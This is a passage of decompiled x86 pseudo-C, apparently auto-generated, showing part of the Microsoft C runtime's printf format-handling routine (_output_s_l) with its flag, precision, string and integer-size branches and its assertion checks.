                            																			__ecx =  *(__ebp - 0x10) | 0x00000800;
                            																			__eflags = __ecx;
                            																			 *(__ebp - 0x10) = __ecx;
                            																		}
                            																		goto L90;
                            																	case 3:
                            																		L147:
                            																		 *(__ebp - 0x260) = 7;
                            																		L148:
                            																		 *(__ebp - 8) = 0x10;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																			 *(__ebp - 0x14) = 0x30;
                            																			 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            																			__eflags =  *(__ebp - 0x260) + 0x51;
                            																			 *((char*)(__ebp - 0x13)) = __al;
                            																			 *(__ebp - 0x1c) = 2;
                            																		}
                            																		goto L153;
                            																	case 4:
                            																		L81:
                            																		__eax = __ebp + 0x14;
                            																		 *(__ebp - 0x288) = E0041C290(__ebp + 0x14);
                            																		__eflags =  *(__ebp - 0x288);
                            																		if( *(__ebp - 0x288) == 0) {
                            																			L83:
                            																			__edx =  *0x60b4f0; // 0x407424
                            																			 *(__ebp - 4) = __edx;
                            																			__eax =  *(__ebp - 4);
                            																			 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																			L87:
                            																			goto L190;
                            																		}
                            																		L82:
                            																		__ecx =  *(__ebp - 0x288);
                            																		__eflags =  *(__ecx + 4);
                            																		if( *(__ecx + 4) != 0) {
                            																			L84:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000800;
                            																			if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																				 *(__ebp - 0xc) = 0;
                            																				__edx =  *(__ebp - 0x288);
                            																				__eax =  *(__edx + 4);
                            																				 *(__ebp - 4) =  *(__edx + 4);
                            																				__ecx =  *(__ebp - 0x288);
                            																				__edx =  *__ecx;
                            																				 *(__ebp - 0x24) =  *__ecx;
                            																			} else {
                            																				__edx =  *(__ebp - 0x288);
                            																				__eax =  *(__edx + 4);
                            																				 *(__ebp - 4) =  *(__edx + 4);
                            																				__ecx =  *(__ebp - 0x288);
                            																				__eax =  *__ecx;
                            																				asm("cdq");
                            																				 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																				 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																				 *(__ebp - 0xc) = 1;
                            																			}
                            																			goto L87;
                            																		}
                            																		goto L83;
                            																	case 5:
                            																		L124:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		__eax = __ebp - 0x248;
                            																		 *(__ebp - 4) = __ebp - 0x248;
                            																		 *(__ebp - 0x44) = 0x200;
                            																		__eflags =  *(__ebp - 0x30);
                            																		if( *(__ebp - 0x30) >= 0) {
                            																			L126:
                            																			__eflags =  *(__ebp - 0x30);
                            																			if( *(__ebp - 0x30) != 0) {
                            																				L129:
                            																				__eflags =  *(__ebp - 0x30) - 0x200;
                            																				if( *(__ebp - 0x30) > 0x200) {
                            																					 *(__ebp - 0x30) = 0x200;
                            																				}
                            																				L131:
                            																				__eflags =  *(__ebp - 0x30) - 0xa3;
                            																				if( *(__ebp - 0x30) > 0xa3) {
                            																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																					 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																					__eflags =  *(__ebp - 0x20);
                            																					if( *(__ebp - 0x20) == 0) {
                            																						 *(__ebp - 0x30) = 0xa3;
                            																					} else {
                            																						__eax =  *(__ebp - 0x20);
                            																						 *(__ebp - 4) =  *(__ebp - 0x20);
                            																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																					}
                            																				}
                            																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																				__eax =  *(__ebp + 0x14);
                            																				__ecx =  *(__eax - 8);
                            																				__edx =  *(__eax - 4);
                            																				 *(__ebp - 0x2a8) =  *(__eax - 8);
                            																				 *(__ebp - 0x2a4) =  *(__eax - 4);
                            																				__ecx = __ebp - 0x40;
                            																				_push(E0040D3B0(__ebp - 0x40));
                            																				__eax =  *(__ebp - 0x2c);
                            																				_push( *(__ebp - 0x2c));
                            																				__ecx =  *(__ebp - 0x30);
                            																				_push( *(__ebp - 0x30));
                            																				__edx =  *((char*)(__ebp - 0x251));
                            																				_push( *((char*)(__ebp - 0x251)));
                            																				__eax =  *(__ebp - 0x44);
                            																				_push( *(__ebp - 0x44));
                            																				__ecx =  *(__ebp - 4);
                            																				_push( *(__ebp - 4));
                            																				__edx = __ebp - 0x2a8;
                            																				_push(__ebp - 0x2a8);
                            																				__eax =  *0x60b3cc; // 0x7e8c4bdb
                            																				__eax =  *__eax();
                            																				__esp = __esp + 0x1c;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																				if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																					__eflags =  *(__ebp - 0x30);
                            																					if( *(__ebp - 0x30) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__edx =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																						__eax =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																				}
                            																				__ecx =  *((char*)(__ebp - 0x251));
                            																				__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
                            																				if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__eax =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																						E00410200(__ecx) =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																				}
                            																				__edx =  *(__ebp - 4);
                            																				__eax =  *( *(__ebp - 4));
                            																				__eflags =  *( *(__ebp - 4)) - 0x2d;
                            																				if( *( *(__ebp - 4)) == 0x2d) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																					__edx =  *(__ebp - 4);
                            																					__edx =  *(__ebp - 4) + 1;
                            																					__eflags = __edx;
                            																					 *(__ebp - 4) = __edx;
                            																				}
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				do {
                            																					L190:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L216;
                            																					}
                            																					goto L191;
                            																				} while ( *(__ebp - 0x324) > 0x37);
                            																				goto L72;
                            																			}
                            																			L127:
                            																			__ecx =  *((char*)(__ebp - 0x251));
                            																			__eflags = __ecx - 0x67;
                            																			if(__ecx != 0x67) {
                            																				goto L129;
                            																			}
                            																			L128:
                            																			 *(__ebp - 0x30) = 1;
                            																			goto L131;
                            																		}
                            																		L125:
                            																		 *(__ebp - 0x30) = 6;
                            																		goto L131;
                            																	case 6:
                            																		L75:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000810;
                            																		if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																			__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x284) = __ax;
                            																			__cl =  *(__ebp - 0x284);
                            																			 *(__ebp - 0x248) = __cl;
                            																			 *(__ebp - 0x24) = 1;
                            																		} else {
                            																			 *(__ebp - 0x280) = 0;
                            																			__edx = __ebp + 0x14;
                            																			__eax = E0041C2D0(__ebp + 0x14);
                            																			 *(__ebp - 0x258) = __ax;
                            																			__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            																			__ecx = __ebp - 0x248;
                            																			__edx = __ebp - 0x24;
                            																			 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            																			__eflags =  *(__ebp - 0x280);
                            																			if( *(__ebp - 0x280) != 0) {
                            																				 *(__ebp - 0x28) = 1;
                            																			}
                            																		}
                            																		__edx = __ebp - 0x248;
                            																		 *(__ebp - 4) = __ebp - 0x248;
                            																		while(1) {
                            																			L190:
                            																			__eflags =  *(__ebp - 0x28);
                            																			if( *(__ebp - 0x28) != 0) {
                            																				goto L216;
                            																			}
                            																			goto L191;
                            																		}
                            																	case 7:
                            																		L144:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		 *(__ebp - 8) = 0xa;
                            																		L153:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																		__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																		if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																			if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																						__ecx = __ebp + 0x14;
                            																						__eax = E0041C290(__ebp + 0x14);
                            																						__edx = 0;
                            																						__eflags = 0;
                            																						 *(__ebp - 0x2b8) = __eax;
                            																						 *(__ebp - 0x2b4) = 0;
                            																					} else {
                            																						__eax = __ebp + 0x14;
                            																						__eax = E0041C290(__ebp + 0x14);
                            																						asm("cdq");
                            																						 *(__ebp - 0x2b8) = __eax;
                            																						 *(__ebp - 0x2b4) = __edx;
                            																					}
                            																				} else {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																						__ecx = __ebp + 0x14;
                            																						E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																						asm("cdq");
                            																						 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																						 *(__ebp - 0x2b4) = __edx;
                            																					} else {
                            																						__eax = __ebp + 0x14;
                            																						__eax = E0041C290(__ebp + 0x14);
                            																						__ax = __eax;
                            																						asm("cdq");
                            																						 *(__ebp - 0x2b8) = __eax;
                            																						 *(__ebp - 0x2b4) = __edx;
                            																					}
                            																				}
                            																			} else {
                            																				__eax = __ebp + 0x14;
                            																				 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x2b4) = __edx;
                            																			}
                            																		} else {
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																			 *(__ebp - 0x2b4) = __edx;
                            																		}
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																		if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																			goto L170;
                            																		}
                            																	case 8:
                            																		L109:
                            																		__ecx = __ebp + 0x14;
                            																		 *(__ebp - 0x298) = E0041C290(__ebp + 0x14);
                            																		__eax = E00420F80();
                            																		__eflags = __eax;
                            																		if(__eax != 0) {
                            																			L119:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																				__edx =  *(__ebp - 0x298);
                            																				__eax =  *(__ebp - 0x24c);
                            																				 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																			} else {
                            																				__eax =  *(__ebp - 0x298);
                            																				 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																			}
                            																			 *(__ebp - 0x28) = 1;
                            																			while(1) {
                            																				L190:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L216;
                            																				}
                            																				goto L191;
                            																			}
                            																		}
                            																		L110:
                            																		__edx = 0;
                            																		__eflags = 0;
                            																		if(0 == 0) {
                            																			 *(__ebp - 0x32c) = 0;
                            																		} else {
                            																			 *(__ebp - 0x32c) = 1;
                            																		}
                            																		__eax =  *(__ebp - 0x32c);
                            																		 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            																		__eflags =  *(__ebp - 0x29c);
                            																		if( *(__ebp - 0x29c) == 0) {
                            																			_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																			_push(0);
                            																			_push(0x695);
                            																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																			_push(2);
                            																			__eax = L0040E1A0();
                            																			__esp = __esp + 0x14;
                            																			__eflags = __eax - 1;
                            																			if(__eax == 1) {
                            																				asm("int3");
                            																			}
                            																		}
                            																		__eflags =  *(__ebp - 0x29c);
                            																		if( *(__ebp - 0x29c) != 0) {
                            																			L118:
                            																			while(1) {
                            																				L190:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L216;
                            																				}
                            																				goto L191;
                            																			}
                            																		} else {
                            																			L117:
                            																			 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																			__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																			 *(__ebp - 0x2f8) = 0xffffffff;
                            																			__ecx = __ebp - 0x40;
                            																			__eax = E0040D380(__ecx);
                            																			__eax =  *(__ebp - 0x2f8);
                            																			goto L229;
                            																		}
                            																	case 9:
                            																		L151:
                            																		 *(__ebp - 8) = 8;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																			__edx =  *(__ebp - 0x10);
                            																			__edx =  *(__ebp - 0x10) | 0x00000200;
                            																			__eflags = __edx;
                            																			 *(__ebp - 0x10) = __edx;
                            																		}
                            																		while(1) {
                            																			L153:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__edx = 0;
                            																							__eflags = 0;
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = 0;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						}
                            																					} else {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__ax = __eax;
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						}
                            																					}
                            																				} else {
                            																					__eax = __ebp + 0x14;
                            																					 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x2b4) = __edx;
                            																				}
                            																			} else {
                            																				__ecx = __ebp + 0x14;
                            																				 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x2b4) = __edx;
                            																			}
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																				goto L170;
                            																			}
                            																			goto L166;
                            																		}
                            																	case 0xa:
                            																		L146:
                            																		 *(__ebp - 0x30) = 8;
                            																		goto L147;
                            																	case 0xb:
                            																		L90:
                            																		__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            																		if( *(__ebp - 0x30) != 0xffffffff) {
                            																			__edx =  *(__ebp - 0x30);
                            																			 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            																		} else {
                            																			 *(__ebp - 0x328) = 0x7fffffff;
                            																		}
                            																		__eax =  *(__ebp - 0x328);
                            																		 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            																		__ecx = __ebp + 0x14;
                            																		 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000810;
                            																		if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																			L101:
                            																			__eflags =  *(__ebp - 4);
                            																			if( *(__ebp - 4) == 0) {
                            																				__edx =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __edx;
                            																			}
                            																			__eax =  *(__ebp - 4);
                            																			 *(__ebp - 0x28c) =  *(__ebp - 4);
                            																			while(1) {
                            																				L104:
                            																				__ecx =  *(__ebp - 0x290);
                            																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																				__eflags = __ecx;
                            																				if(__ecx == 0) {
                            																					break;
                            																				}
                            																				L105:
                            																				__eax =  *(__ebp - 0x28c);
                            																				__ecx =  *( *(__ebp - 0x28c));
                            																				__eflags = __ecx;
                            																				if(__ecx == 0) {
                            																					break;
                            																				}
                            																				L106:
                            																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																			}
                            																			L107:
                            																			__eax =  *(__ebp - 0x28c);
                            																			__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																			__eflags = __eax;
                            																			 *(__ebp - 0x24) = __eax;
                            																			goto L108;
                            																		} else {
                            																			L94:
                            																			__eflags =  *(__ebp - 4);
                            																			if( *(__ebp - 4) == 0) {
                            																				__eax =  *0x60b4f4; // 0x407414
                            																				 *(__ebp - 4) = __eax;
                            																			}
                            																			 *(__ebp - 0xc) = 1;
                            																			__ecx =  *(__ebp - 4);
                            																			 *(__ebp - 0x294) =  *(__ebp - 4);
                            																			while(1) {
                            																				L97:
                            																				__edx =  *(__ebp - 0x290);
                            																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																				__eflags =  *(__ebp - 0x290);
                            																				if( *(__ebp - 0x290) == 0) {
                            																					break;
                            																				}
                            																				L98:
                            																				__ecx =  *(__ebp - 0x294);
                            																				__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																				__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																				if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																					break;
                            																				}
                            																				L99:
                            																				 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																				 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																			}
                            																			L100:
                            																			 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            																			__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            																			 *(__ebp - 0x24) = __ecx;
                            																			L108:
                            																			while(1) {
                            																				L190:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L216;
                            																				}
                            																				goto L191;
                            																			}
                            																		}
                            																	case 0xc:
                            																		L145:
                            																		 *(__ebp - 8) = 0xa;
                            																		while(1) {
                            																			L153:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__edx = 0;
                            																							__eflags = 0;
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = 0;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						}
                            																					} else {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__ax = __eax;
                            																							asm("cdq");
                            																							 *(__ebp - 0x2b8) = __eax;
                            																							 *(__ebp - 0x2b4) = __edx;
                            																						}
                            																					}
                            																				} else {
                            																					__eax = __ebp + 0x14;
                            																					 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x2b4) = __edx;
                            																				}
                            																			} else {
                            																				__ecx = __ebp + 0x14;
                            																				 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x2b4) = __edx;
                            																			}
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																				goto L170;
                            																			}
                            																			goto L166;
                            																		}
                            																	case 0xd:
                            																		goto L0;
                            																	case 0xe:
                            																		while(1) {
                            																			L190:
                            																			__eflags =  *(__ebp - 0x28);
                            																			if( *(__ebp - 0x28) != 0) {
                            																				goto L216;
                            																			}
                            																			goto L191;
                            																		}
                            																}
                            															case 8:
                            																L30:
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																goto L33;
                            															case 9:
                            																L31:
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																goto L33;
                            															case 0xa:
                            																L29:
                            																__ecx =  *(__ebp - 0x10);
                            																__ecx =  *(__ebp - 0x10) | 0x00000001;
                            																 *(__ebp - 0x10) = __ecx;
                            																goto L33;
                            															case 0xb:
                            																L28:
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																goto L33;
                            															case 0xc:
                            																L32:
                            																__ecx =  *(__ebp - 0x10);
                            																__ecx =  *(__ebp - 0x10) | 0x00000008;
                            																__eflags = __ecx;
                            																 *(__ebp - 0x10) = __ecx;
                            																goto L33;
                            															case 0xd:
                            																L33:
                            																goto L218;
                            														}
                            													} else {
                            														if(0 == 0) {
                            															 *(_t557 - 0x314) = 0;
                            														} else {
                            															 *(_t557 - 0x314) = 1;
                            														}
                            														_t543 =  *(_t557 - 0x314);
                            														 *(_t557 - 0x278) =  *(_t557 - 0x314);
                            														if( *(_t557 - 0x278) == 0) {
                            															_push(L"(\"Incorrect format specifier\", 0)");
                            															_push(0);
                            															_push(0x460);
                            															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            															_push(2);
                            															_t526 = L0040E1A0();
                            															_t559 = _t559 + 0x14;
                            															if(_t526 == 1) {
                            																asm("int3");
                            															}
                            														}
                            														L14:
                            														if( *(_t557 - 0x278) != 0) {
                            															goto L16;
                            														} else {
                            															 *((intOrPtr*)(L0040EC70(_t543))) = 0x16;
                            															E00411A50(_t528, _t543, _t555, _t556, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            															 *(_t557 - 0x2f0) = 0xffffffff;
                            															E0040D380(_t557 - 0x40);
                            															_t499 =  *(_t557 - 0x2f0);
                            															L229:
                            															return E00416CA0(_t499, _t528,  *(_t557 - 0x48) ^ _t557, _t547, _t555, _t556);
                            														}
                            													}
                            												}
                            												L219:
                            												__eflags =  *(_t557 - 0x25c);
                            												if( *(_t557 - 0x25c) == 0) {
                            													L222:
                            													 *(_t557 - 0x334) = 1;
                            													L223:
                            													_t530 =  *(_t557 - 0x334);
                            													 *(_t557 - 0x2e0) =  *(_t557 - 0x334);
                            													__eflags =  *(_t557 - 0x2e0);
                            													if( *(_t557 - 0x2e0) == 0) {
                            														_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            														_push(0);
                            														_push(0x8f5);
                            														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            														_push(2);
                            														_t504 = L0040E1A0();
                            														_t559 = _t559 + 0x14;
                            														__eflags = _t504 - 1;
                            														if(_t504 == 1) {
                            															asm("int3");
                            														}
                            													}
                            													__eflags =  *(_t557 - 0x2e0);
                            													if( *(_t557 - 0x2e0) != 0) {
                            														 *(_t557 - 0x300) =  *(_t557 - 0x24c);
                            														E0040D380(_t557 - 0x40);
                            														_t499 =  *(_t557 - 0x300);
                            													} else {
                            														 *((intOrPtr*)(L0040EC70(_t530))) = 0x16;
                            														E00411A50(_t528, _t530, _t555, _t556, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            														 *(_t557 - 0x2fc) = 0xffffffff;
                            														E0040D380(_t557 - 0x40);
                            														_t499 =  *(_t557 - 0x2fc);
                            													}
                            													goto L229;
                            												}
                            												L220:
                            												__eflags =  *(_t557 - 0x25c) - 7;
                            												if( *(_t557 - 0x25c) == 7) {
                            													goto L222;
                            												}
                            												L221:
                            												 *(_t557 - 0x334) = 0;
                            												goto L223;
                            											}
                            										}
                            										L187:
                            										__eflags =  *(__ebp - 0x24);
                            										if( *(__ebp - 0x24) == 0) {
                            											L189:
                            											 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            											 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            											__eax =  *(__ebp - 4);
                            											 *( *(__ebp - 4)) = 0x30;
                            											__ecx =  *(__ebp - 0x24);
                            											__ecx =  *(__ebp - 0x24) + 1;
                            											__eflags = __ecx;
                            											 *(__ebp - 0x24) = __ecx;
                            											goto L190;
                            										}
                            										L188:
                            										__eax =  *(__ebp - 4);
                            										__ecx =  *( *(__ebp - 4));
                            										__eflags = __ecx - 0x30;
                            										if(__ecx == 0x30) {
                            											goto L190;
                            										}
                            										goto L189;
                            									}
                            									L183:
                            									__eax =  *(__ebp - 8);
                            									asm("cdq");
